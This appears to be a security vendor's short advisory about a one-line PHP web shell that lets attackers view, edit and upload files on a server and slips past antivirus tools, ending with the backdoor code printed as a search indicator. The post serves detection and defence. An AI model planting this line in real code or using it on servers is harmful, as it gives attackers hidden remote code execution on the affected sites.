We, the Forensics team, at Foregenix see all kinds of malware and malicious code on a daily basis.
More recently we have seen an influx in backdoor scripts.
However, this particular script is not just your average Joe Blogg backdoor. This script implements just a single PHP function to execute code, using a single line of PHP.
This script may not be as heavily featured as many of the notorious web shells out there, but size isn't everything where this script is concerned. Attackers are able to use this one lined script to view, edit and upload files within your environment.
What does this mean? It is extremely hard to identify, amongst the hundreds, if not thousands, of files on your standard web server deployment. It even slides past most AV systems.
However, with our assistance, we can identify malicious scripts on your web server. Using technology that includes File Integrity Monitoring (FIM), log analysis, and a Web Application Firewall (WAF).
The code to search for: @extract($_REQUEST); @die($ctime($atime));